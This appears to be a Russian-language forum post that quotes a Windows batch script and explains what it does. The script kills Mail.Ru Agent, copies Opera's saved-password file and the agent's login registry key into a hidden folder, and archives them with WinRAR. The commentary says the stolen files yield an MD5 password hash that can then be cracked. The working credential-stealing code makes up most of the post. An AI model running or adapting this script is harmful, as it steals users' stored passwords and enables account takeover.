вот такой @echo off taskkill /f /im magent.exe md C:\pass md C:\pass\opera attrib c:\pass +h +a +r CD /D %APPDATA%\Opera\Opera\ copy wand.dat C:\pass\opera >nul md C:\pass\MailAgent\reg regedit.exe -ea C:\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_l ogins2\ CD /D %APPDATA% Xcopy Mra\Update\ver.txt C:\pass\MailAgent /K /H /G /Q /R /S /Y >nul :end md C:\pass start /min WinRAR.exe u -r -y -ep1 C:\pass\pass.rar C:\pass >nul :end nd
Архив будет тут C:\pass\pass.rar Отправляться никуда ничего не будет, если это действующая малварь то возможно что это подпрограмма для основного тела ПО, которое в свою очередь может быть и отправит файлы куда подальше
Вырубает агент для того чтоб положить в этот архив "pass.rar" рег файл маил агнета и файл ver.txt ! в которых хранит пароль маил агент! утащив эти файлы можно узнать MD5 хеш пароля сохраненного в агенте! ну а потом расшифровать его!
